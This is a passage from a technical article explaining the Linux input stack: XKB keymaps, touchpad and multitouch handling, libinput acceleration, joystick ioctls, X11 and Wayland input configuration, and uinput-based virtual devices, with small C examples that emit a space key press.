Another interesting thing to know is that the XKB keymap can be converted
to a console keymap with scripts such as setupcon(1), which relies on
ckbcomp and others, and reads its conf from /etc/default/keyboard.
Obviously, let’s not forget to mention
localectl(1)
to interface with
systemd-localed.service(8)
that is the newer version of
setupcon(1)
. It’s sort of a big wrapper over other tools and behavior
to automate things.
> localectl
System Locale: LANG=en_US.UTF-8
VC Keymap: us
X11 Layout: us
We’ll see how it sets it in X11, but let’s just say it can be used to
list keymaps:
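For instance, the console keymaps:

> localectl list-keymaps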
There are also the options list-x11-keymap-models, list-x11-keymap-layouts,
list-x11-keymap-variants [LAYOUT], and list-x11-keymap-options.
And it can be set with set-x11-keymap. However, it always tries to
convert the XKB keymap to a console keymap whenever it can; if you don’t
want that behavior, you should add this option:
> localectl set-x11-keymap --no-convert keymap
Let’s end on a funny note to wrap things up about XKB. Yubikeys work by
simulating keyboards, and thus they have to anticipate a very specific
layout and variant, otherwise inserting a Yubikey would output the
wrong values. To skip this, there are udev device properties (
ENV{}
set from hwdb) called
XKB_FIXED_LAYOUT
and
XKB_FIXED_VARIANT
that
need to be set and respected by the clients of libxkbcommon.
From
60-keyboard.hwdb
:
# Yubico Yubico Yubikey II
evdev:input:b0003v1050p0010*
# Yubico Yubikey NEO OTP+CCID
evdev:input:b0003v1050p0111*
# Yubico Yubikey NEO OTP+U2F+CCID
evdev:input:b0003v1050p0116*
# OKE Electron Company USB barcode reader
evdev:input:b0003v05FEp1010*
XKB_FIXED_LAYOUT=us
XKB_FIXED_VARIANT=
Here’s a summary of what was discussed in the XKB stack:
Pointer Specifics
We’ve seen a lot of complex keyboard specific input behavior, let’s
dabble a bit with pointer devices now, from mice to touchpads.
Types of Touchpads
Let’s mention a few definitions.
In general we call a pointer the representation of the input device,
and the cursor the drawn icon representation.
We have clickpads, touchpads that have no separate buttons but are
clickable over their whole surface; the behavior then depends on where
the click happens. Meanwhile, forcepads are like clickpads but without
any moving button at all: they instead vibrate when pressed. Lastly,
trackpoints are the little nub in the middle of the keyboard of
Thinkpads; they’re tagged in udev/hwdb with the ID_INPUT_POINTINGSTICK
property.
Device: TPPS/2 Elan TrackPoint
trackpoint: the nudge of thinkpads
# Name: TPPS/2 Elan TrackPoint
# ID: bus 0x0011 vendor 0x0002 product 0x000a version 0x0063
# Supported Events:
# Event type 0 (EV_SYN)
# Event type 1 (EV_KEY)
#   Event code 272 (BTN_LEFT)
#   Event code 273 (BTN_RIGHT)
#   Event code 274 (BTN_MIDDLE)
# Event type 2 (EV_REL)
#   Event code 0 (REL_X)
#   Event code 1 (REL_Y)
# Properties:
#   Property 0 (INPUT_PROP_POINTER)
#   Property 5 (INPUT_PROP_POINTING_STICK)
properties:
- ID_INPUT=1
- ID_INPUT_MOUSE=1
- ID_INPUT_POINTINGSTICK=1
driver: psmouse
As you can see from the above, the trackpoint also has attached to it
some physical buttons, they’re the ones above the Thinkpad touchpad. It’s
in between a mouse and a touchpad.
There are internal touchpads and external touchpads. The external
touchpads don’t get turned off when the lid is closed, nor disabled
while typing. A graphic tablet such as a wacom device is effectively an
external touchpad.
This information can be embedded in a udev device property called
ENV{ID_INPUT_TOUCHPAD_INTEGRATION}, set to either “external” or
“internal”. This is part of the hwdb, out-of-the-box.
A last interesting fact is that some touchpads have capacitive touch,
meaning they can detect a finger in a range above the touchpad, hovering
in proximity. This is BTN_TOOL_FINGER, in contrast to BTN_TOUCH, but they
often come together, so you have to discern whether it’s a real touchdown
or not. For MT there are also ABS_MT_PRESSURE and ABS_MT_DISTANCE that
can be used for this. That’s another job that libinput is good at.
MT — MultiTouch
We quickly went over the concept of MT, or multitouch, before; let’s add
a bit more info. Multitouch touchpads support tracking more than one
finger. They speak evdev multitouch to user-space (type B), and are most
often handled by the hid-multitouch driver on the kernel side.
The capabilities of an MT touchpad should have something similar to this
(
libinput record
output or others):
key: BTN_LEFT, BTN_TOOL_FINGER, BTN_TOOL_DOUBLETAP, BTN_TOUCH
(BTN_TOOL_DOUBLETAP up to BTN_TOOL_QUINTTAP)
abs: ABS_X, ABS_Y, ABS_MT_SLOT, ABS_MT_POSITION_X, ABS_MT_POSITION_Y,
ABS_MT_TOOL_TYPE, ABS_MT_TRACKING_ID
There can also be ABS_MT_TOUCH_MAJOR, ABS_MT_TOUCH_MINOR,
ABS_MT_WIDTH_MAJOR, and ABS_MT_WIDTH_MINOR, which are used to provide
the size of the contact area in surface or absolute units. There’s also
ABS_MT_ORIENTATION, for the orientation of the touching ellipse (finger).
For MT, the key events are simple, they tell us how many fingers are
tapping.
Then, fingers are tracked in what’s called “slots”, along with a new
unique tracking id each time a finger touches down again, and like all
of evdev it’s a stateful protocol.
So for example, slot 0 gets assigned tracking id 1 when the first finger
is down, then slot 1 gets assigned tracking id 2 when the second finger
is down, then the first finger is lifted and put back down again, and
slot 0 gets assigned tracking id 3.
That can sound complex to track, and again that’s where libinput
shines. Here’s what it looks like in a simplified evdev trace:
Once upon a time everyone was bragging about their synaptics touchpad
confs, yet this is now deprecated in favor of libinput. What was that
all about?
Synaptics, unrelated to synaptics inc, was a complex X11 driver with
so many configurations. It was buggy and had lots of internal magic,
especially its acceleration profiles, which had logic split between the
X11 server and the driver.
Synaptics was configured through the synclient command-line tool, which
talked to the driver over a special interface with a custom protocol
(a shared memory segment). That was before X11 had any standard way to
be configured dynamically (with xinput), and before evdev was a thing.
This was hacky.
These days X11 and Wayland rely on libinput so this should be used
instead.
The only feature missing from libinput, and instead implemented in
user-space by the widget libraries and DEs, is kinetic scrolling with its
non-linear scroll speed. That’s mostly a non-issue.
Acceleration Profile
Simply said, pointer acceleration is the function that multiplies the
movement deltas with a given factor:
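delta_accelerated = delta_device × factor(pointer speed)

(a simplified sketch of the relation, not libinput’s exact internals)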
One of the main roles of libinput is to make pointer movement as precise
as possible on all devices: if the user intends and performs an action,
the result should be what they expected.
An acceleration profile defines a series of points of the form (x, f(x)),
input speed to output speed, that are linearly interpolated (a curve is
drawn between them to deduce the values in between). For example, flat
acceleration is [(0.0, 0.0), (1.0, 1.0)].
The default acceleration, adaptive, is pretty smart, and differs per
device type and resolution, it already has these configured for touchpads
for example:
super-slow: deceleration
slow: deceleration
medium: adaptive+deceleration
fast: adaptive+fast
flick: fast
In general, libinput allows configuring this behavior. We can pick
between 3 pointer acceleration profiles: adaptive (the default), flat
(the 45° one we’ve seen), and custom profiles, along with the different
types of motion the profiles can apply to: motion, scroll, fallback. For
a custom profile we can configure points and a step: the points are the
(x, y) pairs creating the acceleration curve we talked about, and the
step is the interpolation granularity between the points (a value of 0
uses the default).
In most cases, not touching the acceleration profile provides better
results.
In libinput list-devices, for a touchpad:
Accel profiles: flat *adaptive custom
Gestures
We’ve seen that libinput offers two types of gestures out-of-the-box:
swiping and pinching. For anything else, one has to rely on third party
libraries. Here are a few:
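Well-known examples include libinput-gestures, Touchégg, and Fusuma.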
Let’s close this section with a few random details that don’t need
much discussion.
High-end gaming mice are finicky and often normal basic drivers are not
enough to configure their high precision, nor is libinput. That’s why the
libratbag
project exists.
libwacom (not only for wacom) and tools such as Tuhi are used to manage
the information libinput needs to handle drawing tablets. These tablets
come with a tool such as a pen/stylus, whose specifics are handled too,
for example pressing a certain button to reverse the behavior and start
erasing. There are X11 tools such as xsetwacom that also help.
An interesting piece of software is gpm(8), a console mouse daemon that
reads the mouse stream character device directly and translates it into
the TIOCLINUX TIOCL_SELMOUSEREPORT terminal ioctl to draw it. The
terminal will then output specific mouse reporting escape codes (more
info here).
Finally, here’s a few pointer specific debug tools:
Gamepads aren’t handled by libinput in user-space, nor do they rely on
the evdev handler in the kernel. Instead they rely on the joydev handler.
The gamepads get associated with their specific drivers, which will
consume all these events. The joydev handler then normalizes them and
sends them to user-space in a format called js_event from
include/uapi/linux/joystick.h.
The handler will listen to all devices that support EV_KEY BTN_JOYSTICK
or BTN_GAMEPAD and similar events, and create a stream device for them
in devtmpfs: /dev/input/jsN.
The handler character device supports a bunch of standard ioctl calls
to get/set info (a small sketch of using them directly follows the list):
JSIOCGVERSION: get driver version
JSIOCGAXES: get number of axes
JSIOCGBUTTONS: get number of buttons
JSIOCGNAME(len): get identifier string
JSIOCSCORR: set correction values
JSIOCGCORR: get correction values
JSIOCSAXMAP: set axis mapping
JSIOCGAXMAP: get axis mapping
JSIOCSBTNMAP: set button mapping
JSIOCGBTNMAP: get button mapping
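A minimal sketch of poking the joydev interface directly (not from the
article; /dev/input/js0 is an assumption):

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/joystick.h>

int main(void)
{
    int fd = open("/dev/input/js0", O_RDONLY);
    if (fd < 0)
        return 1;

    char name[128] = "unknown";
    unsigned char axes = 0, buttons = 0;
    ioctl(fd, JSIOCGNAME(sizeof(name)), name);
    ioctl(fd, JSIOCGAXES, &axes);
    ioctl(fd, JSIOCGBUTTONS, &buttons);
    printf("%s: %u axes, %u buttons\n", name, axes, buttons);

    // Each read returns one normalized js_event (button or axis change)
    struct js_event e;
    while (read(fd, &e, sizeof(e)) == sizeof(e)) {
        if (e.type & JS_EVENT_BUTTON)
            printf("button %u %s\n", e.number, e.value ? "pressed" : "released");
        else if (e.type & JS_EVENT_AXIS)
            printf("axis %u value %d\n", e.number, e.value);
    }

    close(fd);
    return 0;
}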
Obviously, it’s better to do this via tools such as:
jstest
and
jstest-gtk
jscal
joyful
Upper Stack: X11 & Wayland
We’ve reached the graphical environment with desktop widget libraries such
as GNOME and Qt, and the XServer and Wayland Compositors. They’re
the ones that rely on all types of input events for concrete behavior,
from clicking buttons on the appropriate window, drawing a cursor
on screen, scrolling, and literally all interactions a user has with
a computer.
This upper stack relies on libinput and XKB to make everything happen. As
far as these two are concerned, the role of the upper stack is to
initialize them with the right configurations, and then create the
handling for whatever they’re meant to do.
The big difference between the X11 stack and Wayland stack is related to
the protocol and where these libraries are included. There are no window
managers in Wayland, but compositors that fully implement the standard
protocol of both a display server and window manager at the same time. So
it’s not a two-process equation, the compositor is the one handling
libinput and implementing the desktop interface. Meanwhile, in X11, the
Xserver, which is quite old, has the abstract concept of input drivers,
of which the currently only useful one is
xf86-input-libinput
. The
X11 input are interfaced with through the X11 protocol with XInput
events shared to the WM and other clients so that they can use them,
and configure the server’s input devices. Similarly, in X11 all the
configurations happen over the X protocol and its extensions, meanwhile
for compositors there’s no agreed way to configure things, so each
compositor can implement their own thing.
Here’s a general picture of the stack (
courtesy of
who-t, Peter Hutterer
):
Obviously, each has its own internal representation and way of managing
the information it gets from libinput, XKB, and others (wl_pointer and
wl_keyboard on Wayland for example), but this is outside the scope of
this article. Let’s focus more on how they configure the input stack
we’ve seen.
The X server has an internal store of information about input devices
and their drivers, and will apply the default settings for each. To
apply specific configurations for certain devices, we can add snippets
in the X11 config directory, usually /usr/share/X11/xorg.conf.d/. The
libinput(4) driver settings can be passed there for a matching device.
The “Identifier” is just a human-readable string for logging, while the
series of “Match” statements can be found in xorg.conf(5); there are
quite a few of them and they remind us of udev rules. The “Option” part
is what interests us: these are the settings passed to libinput, and
they can be found in libinput(4). For example:
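A sketch of such a snippet (the identifier string and option values are
illustrative; the option names come from libinput(4)):

Section "InputClass"
        Identifier "my libinput touchpad overrides"
        MatchIsTouchpad "on"
        MatchDevicePath "/dev/input/event*"
        Driver "libinput"
        Option "Tapping" "on"
        Option "NaturalScrolling" "true"
EndSection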
On the X11 stack, the server will initially set these values to override
the default ones, but afterward, during runtime, any caller can rely on
the X protocol to update them. The xinput(1) command can be used to
debug and test setting X input devices.
To list input devices that the X server is aware of:
> xinput list
⎡ Virtual core pointer id=2 [master pointer (3)]
⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)]
⎜ ↳ ETPS/2 Elantech Touchpad id=15 [slave pointer (2)]
⎜ ↳ SEMICO USB Keyboard Consumer Control id=10 [slave pointer (2)]
⎣ Virtual core keyboard id=3 [master keyboard (2)]
↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)]
↳ Power Button id=6 [slave keyboard (3)]
↳ Video Bus id=7 [slave keyboard (3)]
↳ Power Button id=8 [slave keyboard (3)]
↳ Sleep Button id=9 [slave keyboard (3)]
↳ AT Translated Set 2 keyboard id=14 [slave keyboard (3)]
↳ Acer WMI hotkeys id=16 [slave keyboard (3)]
↳ GeneralPlus USB Audio Device id=17 [slave keyboard (3)]
↳ SEMICO USB Keyboard Consumer Control id=11 [slave keyboard (3)]
↳ SEMICO USB Keyboard System Control id=12 [slave keyboard (3)]
↳ SEMICO USB Keyboard id=13 [slave keyboard (3)]
NB: Keep in mind the XTEST virtual devices, which only exist internally
within X11 and don’t appear in libinput list-devices; we’ll get back to
these in the next section.
Or list the properties of a particular device entry:
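For instance, using one of the device names from the listing above:

> xinput list-props "ETPS/2 Elantech Touchpad"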
What happens here is that the client (xinput) talks to the X server
over the X protocol, then the X server talks to its libinput driver
xf86-input-libinput, which in turn talks to libinput and updates its
configuration, and the X server keeps track of all this.
This all looks somewhat redundant, as you can see; it’s like having an
intermediate layer. That’s why on Wayland there’s no intermediary: if a
client tells the compositor, through whatever configuration means it
exposes, to set certain settings on an input device, it does it directly
via libinput. Yet the list of input devices is internal to the compositor
and not exposed directly in the protocol, which is why it differs in each
compositor implementation.
For instance, if we’re toggling a setting in GNOME, KDE, MATE, or others,
the behavior will be more direct. In GNOME, things happen through
gsettings
:
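Something like this, for example (the schema and key are GNOME’s touchpad
settings; the value is just an illustration):

> gsettings set org.gnome.desktop.peripherals.touchpad tap-to-click true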
So that’s how you’d configure input devices on GNOME Wayland compositor
Mutter. Yet that’s annoying, isn’t there a common way to do this on
Wayland?
There are workarounds such as
libinput-config
but it’s not
very well maintained.
So, clients in graphical environments need to get input events to
them. On X11 these are called X events, and they can be spied on with the
xev(1)
tool, which can help debug issues. It shows events sent to the
particular window chosen.
In theory, on X11 one could catch all the events the “root window” is
subscribed to (xev -root does that), or those of any other window. Events
conceptually travel down the window hierarchy, and clients only receive
the events for which they have selected an appropriate event mask.
However, the root window always sits at the top of this hierarchy and
can optionally subscribe to essentially all events before they propagate
to child windows, while grabs and higher-priority selections (such as by
the window manager) can intercept or redirect them. That’s how WMs work:
they’re the parent window, they set an “event mask” to catch certain
events and input for themselves, and they are exclusively allowed to
redirect certain events such as mapping/moving/configuring windows.
Meanwhile, a sort of equivalent, but simpler, tool on Wayland is called
wev; we’ll do the comparison in a bit to help us understand the
differences. Here’s a trace of xev:
> xev -event keyboard
KeyRelease event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318306, (81,81), root:(893,376),
state 0x10, keycode 108 (keysym 0xff20, Multi_key), same_screen YES,
XLookupString gives 0 bytes:
XFilterEvent returns: False
…
KeyRelease event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318602, (81,81), root:(893,376),
state 0x10, keycode 48 (keysym 0x27, apostrophe), same_screen YES,
XLookupString gives 1 bytes: (27)"'"
XFilterEvent returns: False
KeyPress event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318866, (81,81), root:(893,376),
state 0x10, keycode 26 (keysym 0x65, e), same_screen YES,
XLookupString gives 1 bytes: (65)"e"
XmbLookupString gives 1 bytes: (65)"e"
XFilterEvent returns: True
KeyPress event, serial 28, synthetic NO, window 0x2e00001,
root 0x3fa, subw 0x0, time 465318866, (81,81), root:(893,376),
state 0x10, keycode 0 (keysym 0xe9, eacute), same_screen YES,
XLookupString gives 0 bytes:
XmbLookupString gives 2 bytes: (c3 a9)"é"
XFilterEvent returns: False
As you can observe here, the Xlib client does a lookup for the keycode
to keysym translation by relying on functions such as XLookupString and
XmbLookupString. These particular functions use a keymap logic that dates
back to pre-XKB times; we’ll talk more about them in a bit. Yet internally
the X server now does rely on XKB in the backend: just like for input
device info, it keeps a keymap table internally, and it’s shared over the
X protocol with clients (they ask for it at connection time, or lazily
when calling functions, and cache it) so that they can perform the
translation with Xlib or XCB.
There are two main formats for the shared X server keymap the clients
can rely on: the old “X core keymap”, and an XKB keymap. We’ll discuss
that old core keymap in a bit.
In XCB, the old keymap translation is done via:
xcb_key_symbols_get_keycode
xcb_key_symbols_get_keysym
And in Xlib with functions such as:
XLookupString
Xutf8LookupString
XLookupKeysym
XkbTranslateKeyCode
XkbTranslateKeySym
XStringToKeysym
XKeysymToKeycode
Meanwhile, with the newer XKB keymap it’s done via:
XkbTranslateKeyCode
Or in XCB with the xcb_xkb_* functions (you have to do it manually).
In all cases, since XKB is the technology in the backend of the X server
that stores the keymap truth, it’s what needs to be configured. The XKB
configuration can be set statically, along with the usual input confs
we’ve seen earlier, with the Xkb options:
There are also two special options that get interpreted when certain
special keysyms are generated: DontVTSwitch, which disables the
Ctrl+Alt+Fn sequence for switching virtual terminals, and DontZap, which
catches the XKB Terminate_Server keysym that kills the Xorg server. Both
behaviors are enabled by default, and these options turn them off.
To change the XKB options on a running X server on-the-fly, we rely on
two tools: xkbcomp(1) and setxkbmap(1). The first one is used to compile
a new KcCGST and upload it to the server as a full keymap in the compiled
XKM format that the server understands, and the second one to change the
current value of the RMLVO.
> setxkbmap -print-verbose 10
Setting verbose level to 10
locale is C
Trying to load rules file ./rules/evdev...
Trying to load rules file /usr/share/X11/xkb/rules/evdev...
Success.
Applied rules from evdev:
rules: evdev
model: pc105
layout: us
options: compose:ralt
Trying to build keymap using the following components:
keycodes: evdev+aliases(qwerty)
types: complete
compat: complete
symbols: pc+us+inet(evdev)+compose(ralt)
geometry: pc(pc105)
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us+inet(evdev)+compose(ralt)"};
	xkb_geometry { include "pc(pc105)" };
};
Now let’s talk about that pre-XKB logic with functions such as
XLookupKeysym(3)
we’ve seen in the
xev
trace earlier. It’s currently
basically a wrapper over XKB, but that can also bypass it entirely. It
relies on the old “X core keymap table” in the X server, a facade on
the authoritative keymap that is XKB backed. The client asks for it
via a request, cache it, and use it for the mapping of X11 keycode
to X11 keysym. It’s own X11 keycodes are implementation dependent,
but nowadays it’s mostly
evdev + 8
, and its keysyms are found in
/usr/include/X11/keysymdef.h
, which the newer XKB stack also relies
on in X11. So that old keymap is indeed initially filled with the XKB
keymap. The tool
xmodmap(1)
will help us explore and show some of the
things it handles.
Yes, xmodmap has its own configuration in ~/.Xmodmap and an expression
grammar that looks something like a simplified version of XKB:
! remove Caps Lock functionality
remove Lock = Caps_Lock
! make CapsLock (keycode 66) act as Tab
keycode 66 = Tab
! set Menu key (keycode 134) properly
keycode 134 = Menu
! Set Right Alt as Compose (Multi_key)
! Use keysym form so you don't need to know the numeric keycode:
keysym Alt_R = Multi_key
! ensure Right Alt is not still treated as an Alt modifier
remove Mod1 = Alt_R
There’s even the
xkeycaps
GUI around it, and wrappers like
xcape
.
Yet, GNOME and certain other toolkits and desktop environments stopped
relying on the old core keymap a long time ago, deprecating it in favor
of the XKB-related functions. Still, the X server will internally reflect
core-keymap changes in its XKB cache, keeping the two internally
compatible and notifying X clients of the change (mainly with
XChangeKeyboardMapping, which calls XkbApplyMappingChange in the X
server), and it’ll work, but only temporarily. It’s fragile and legacy.
Also, changing the keymap with xmodmap is flimsy, since any time the XKB
keymap is reloaded, the changes to the old in-memory X keymap
compatibility layer are lost. Put together, this means it isn’t reliable
to use the old X11 core keymap.
As you can see yet again, this is quite confusing and redundant, and
obviously Wayland doesn’t have these old layers of indirection: it relies
on XKB directly. It also doesn’t need a compiled form like XKM to upload
keymaps to the server; there is no such upload in the protocol at all.
The keycode to keysym translation is also done in the client (with calls
such as xkb_state_key_get_one_sym), but the keymap is shared directly
along with the wl_keyboard object the client gets when it requests input
access on the seat, so there’s no need for another round-trip.
Yet, again, the configuration of XKB-related things on Wayland depends
on the compositor implementation. For example, wlroots relies on
environment variables to set the RMLVO (XKB_DEFAULT_LAYOUT,
XKB_DEFAULT_VARIANT, XKB_DEFAULT_OPTIONS, and so on), and GNOME on
gsettings, with
gsettings set org.gnome.desktop.input-sources sources "[('xkb', 'us'), ('xkb', 'fr')]"
Let’s go back to the
wev
tool,
which displays input events on Wayland, it’ll help us understand a
huge difference in input handling on Wayland compared to X11. Unlike X
severs, a Wayland compositor doesn’t propagate and broadcast the events
globally to anyone listening. Instead, clients must explicitly register
a listener for the objects they care about. These are announced via the
global Wayland registry, which it has to register to (
wl_registry
).
Afterward, a client has to bind and listen to the given seat (
wl_seat
)
of the given name by the registry (this is where the
ENV{ID_SEAT}
and
loginctl
can help since they often map 1-to-1), and advertise the set of
“seat capabilities” it requires and wants to bind to, such as pointer,
keyboard, or touch. Once bound, the client can now fetch a handle to the
wl_<pointer/keyboard/touch>
objects, and register listener handlers
for their events. Let’s note that a
wl_keyboard
is an abstraction
of all logical keyboard events. So clients aren’t aware of underlying
devices, it’s abstracted and aggregated in the compositor internally,
by its own logic. Plus, for extra security,
wl_<pointer/keyboard/touch>
events are only forwarded to the currently focused client. All and all,
it’s very choreographed, unlike in X11.
Beyond the core protocol, there are more “unstable” or “non-standard”
extensions that allow clients to do more things related to input. Here’s
a non-exhaustive list:
Repositioning the pointer (wp_pointer_warp_v1)
Subscribing to high-def keyboard timestamps (zwp_input_timestamps_manager_v1)
Ignoring keyboard shortcuts from a client (zwp_keyboard_shortcuts_inhibit_manager_v1)
Adding constraints to pointer motion (zwp_pointer_constraints_v1)
Registering to handle gestures, swipe, pinch, and hold (zwp_pointer_gestures_v1)
Specific XWayland grabbing of input, monopolizing it (zwp_xwayland_keyboard_grab_manager_v1)
Grabbing hotkeys, usually not needed since the compositor does this (hyprland_global_shortcuts_manager_v1)
Grabbing/inhibiting input to a single surface such as a lock screen (zwlr_input_inhibit_manager_v1, hyprland_focus_grab_manager_v1)
Notice too that nowhere in the protocol is there an interface to list
the compositor’s internal input devices in its registry; it’s
intentionally abstracted away. It’s up to each compositor to choose
whether it wants to expose this info. To my knowledge, only Sway offers
an interface for this, through swaymsg; it’s kind of similar to gsettings.
The closest compositor-agnostic tools are external utilities such as
libinput list-devices or loginctl seat-status. However, these enumerate
kernel devices, not the compositor’s internal virtual devices, so you
will not see compositor-created synthetic devices there.
In short, which compositor implements which parts of the “non-standard”
protocols varies a lot. GNOME uses almost none of the wlroots/WLR
extensions, KDE uses KDE-specific extensions, and wlroots-based
compositors share the WLR extensions. It’s a mix really; check this for
support and more info.
We mentioned localectl before for setting keyboard keymap setups in a
way that works across environments. Let’s add that when using the
set-x11-keymap option it will modify the X11 configuration in
/etc/X11/xorg.conf.d/00-keyboard.conf and pre-fill it for you, so you
won’t have to worry about editing anything with the options we’ve
listed. It doesn’t have an equivalent option for Wayland though.
Yet, what if someone on Wayland wants to remap just a specific key
without going through static XKB and its mess, just a quick runtime
change? There’s no real solution to that other than what we’ve already
mentioned in the scancode to keycode section, namely tools that rely on
evdev interception to remap events, such as evmapd, evremap,
evdevremapkeys, evsieve, keyd, kbct, makima, input-remapper, etc. A true
panoply of tools that are hacks. Most, if not all, of these work by
intercepting evdev events, creating a new virtual device (we’ll see how
uinput works in the next section), and modifying the events on-the-fly
to write them to the virtual device. This adds a new, unnecessary layer
of indirection, which you should obviously avoid if you are doing
anything speed-sensitive with the keyboard. Furthermore, some of these
re-implement key composition and a semblance of XKB logic within them,
which creates a total mess.
Let’s continue…
Contrary to everything else in the GUI stack, XKB composition is a bit
less cumbersome. Both Wayland clients, through their toolkits (GTK, Qt,
etc.), and X11 clients, through Xlib with the functions we’ve seen
earlier that do it out-of-the-box (XLookupString), rely on the same
configuration files we’ve discussed in the XKB section, namely
/usr/share/X11/locale/<locale>/Compose and the home ~/.XCompose. It
follows the simple format described in Compose(5).
And lastly, one thing that is handled neither in libinput nor in XKB is
key repeat: how long, when holding a key, the client waits before
printing it again.
In X11 this is configured in the X server, either with the startup
options -ardelay and -arinterval, or dynamically via xset(1). There’s
the option to set the delay and interval for a specific key too.
> xset r rate delay [rate]
> xset r rate 210 50
If you inspect xev you’ll see that the server resends keys to the client
continuously.
Meanwhile, as with everything else on Wayland, it depends on the
compositor. The compositor sends to the clients the repeat parameters
wl_keyboard.repeat_info(rate, delay)
and it’s up to them to respect
it. So, the compositor doesn’t keep forwarding the key to the client but
instead this is handled directly in the client.
And similarly, these are configured in gsettings and other
compositor-specific configurations. Delegating the repeat key rate and
delay to clients on Wayland has had its share of issues though (see),
and some people want to have it back in the compositor.
That’s it, we’ve covered most of the things we wanted in the upper
graphical stack.
Virtual Input, Automation, Emulation, and Remote Desktop
We’ve grazed the topic of virtual inputs before, in this section we’ll
see what types exist and where they’re used, from automation, emulation,
and remote desktop.
The first layer where we can create virtual input devices is at the
kernel layer. It provides two modules that can be used for this:
UHID
, User-space I/O driver support for HID subsystem, and uinput,
the User-space input emulation module.
The uhid module, as the name implies, allows simulating HID events from
user-space by reading/writing to a special character device in devtmpfs,
/dev/uhid. The interface is quite simple, as is shown in this example.
However, this is only used for emulating devices and debugging, not for
the average user’s virtual input. This is the underlying mechanism behind
hid-recorder and hid-replay, which easily allow debugging HID issues by
reproducing the exact sequence of events on anyone’s machine.
While uhid acts at the HID layer, the uinput module
(drivers/input/misc/uinput.c) acts at the input core layer, which makes
it more approachable for basic input event virtualisation. It is also a
character device in devtmpfs, /dev/uinput, that exposes particular ioctls
to create, manage, and configure the capabilities of a virtual device,
and then allows writing to the /dev/uinput file descriptor to simulate
the events of said device. The device will appear, like any other input
device, in devtmpfs and sysfs, since it passes through the same pipeline
with struct input_dev and the default evdev event handler.
There are two main ways to use uinput in code: via <linux/uinput.h> or
via <libevdev/libevdev-uinput.h>. The libevdev mechanism is simpler and
recommended.
Example 1:
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <linux/uinput.h>

void emit(int fd, int type, int code, int val)
{
   struct input_event ie;

   ie.type = type;
   ie.code = code;
   ie.value = val;
   /* timestamp values below are ignored */
   ie.time.tv_sec = 0;
   ie.time.tv_usec = 0;

   write(fd, &ie, sizeof(ie));
}

int main(void)
{
   struct uinput_setup usetup;

   int fd = open("/dev/uinput", O_WRONLY | O_NONBLOCK);

   /*
    * The ioctls below will enable the device that is about to be
    * created, to pass key events, in this case the space key.
    */
   ioctl(fd, UI_SET_EVBIT, EV_KEY);
   ioctl(fd, UI_SET_KEYBIT, KEY_SPACE);

   memset(&usetup, 0, sizeof(usetup));
   usetup.id.bustype = BUS_USB;
   usetup.id.vendor = 0x1234;  /* sample vendor */
   usetup.id.product = 0x5678; /* sample product */
   strcpy(usetup.name, "Example device");

   ioctl(fd, UI_DEV_SETUP, &usetup);
   ioctl(fd, UI_DEV_CREATE);

   /*
    * On UI_DEV_CREATE the kernel will create the device node for this
    * device. We are inserting a pause here so that user-space has time
    * to detect, initialize the new device, and can start listening to
    * the event, otherwise it will not notice the event we are about
    * to send. This pause is only needed in our example code!
    */
   sleep(60);

   /* Key press, report the event, send key release, and report again */
   emit(fd, EV_KEY, KEY_SPACE, 1);
   emit(fd, EV_SYN, SYN_REPORT, 0);
   emit(fd, EV_KEY, KEY_SPACE, 0);
   emit(fd, EV_SYN, SYN_REPORT, 0);

   /*
    * Give user-space some time to read the events before we destroy the
    * device with UI_DEV_DESTROY.
    */
   sleep(100);

   ioctl(fd, UI_DEV_DESTROY);
   close(fd);

   return 0;
}
Compile with
gcc -o uinput_test uinput_test.c -Wall -Wextra
And example 2 with libevdev:
#include <libevdev/libevdev.h>
#include <libevdev/libevdev-uinput.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>

int main(void)
{
    struct libevdev *dev = NULL;
    struct libevdev_uinput *uidev = NULL;
    int err;

    /* Allocate and configure the virtual device */
    dev = libevdev_new();
    if (!dev) {
        fprintf(stderr, "Failed to allocate libevdev device\n");
        return 1;
    }

    libevdev_set_name(dev, "Example device (libevdev uinput)");
    libevdev_set_id_bustype(dev, BUS_USB);
    libevdev_set_id_vendor(dev, 0x1234);
    libevdev_set_id_product(dev, 0x5678);

    /* Enable only one key: KEY_SPACE */
    libevdev_enable_event_type(dev, EV_KEY);
    libevdev_enable_event_code(dev, EV_KEY, KEY_SPACE, NULL);

    /* Create the uinput device */
    err = libevdev_uinput_create_from_device(dev, LIBEVDEV_UINPUT_OPEN_MANAGED, &uidev);
    if (err != 0) {
        fprintf(stderr, "Failed to create uinput device: %s\n", strerror(-err));
        return 1;
    }

    /* A pause to allow the system (udev etc.) to register the device */
    sleep(100);

    /* Emit a space key press */
    libevdev_uinput_write_event(uidev, EV_KEY, KEY_SPACE, 1);
    libevdev_uinput_write_event(uidev, EV_SYN, SYN_REPORT, 0);

    /* Emit the key release */
    libevdev_uinput_write_event(uidev, EV_KEY, KEY_SPACE, 0);
    libevdev_uinput_write_event(uidev, EV_SYN, SYN_REPORT, 0);

    /* Let user-space read the events before destruction (optional) */
    sleep(200);

    libevdev_uinput_destroy(uidev);
    libevdev_free(dev);
    return 0;
}
The disadvantage of uhid and uinput is that, since they interface with
the kernel, they require root privilege and relying on HID or evdev might
not be practical for the average day-to-day usage. For example, if we
want to output a symbol, let’s say ‘p’, we have to know its keycode, and
for that we need to know the keymapping, which in turn requires XKB or
others. Thus, we’re back to square one and re-creating the upper input
stack from scratch.
What if we could directly say “send this keycode or keysym, it’s from this
virtual device”, without even needing extra permission if we’re already in
a desktop environment. Well, that’s exactly what the X11 XTEST extension
does, and what some Wayland extensions and mechanisms achieve too.
Remember when we used xinput to list some devices and some virtual ones
were listed:
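Namely these two entries:

⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)]
↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)]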
These were created by the XTest extension which was written to support
automated testing of X server. These days this can be used for remote
desktop, task automation, password managers (autofill), and others. When
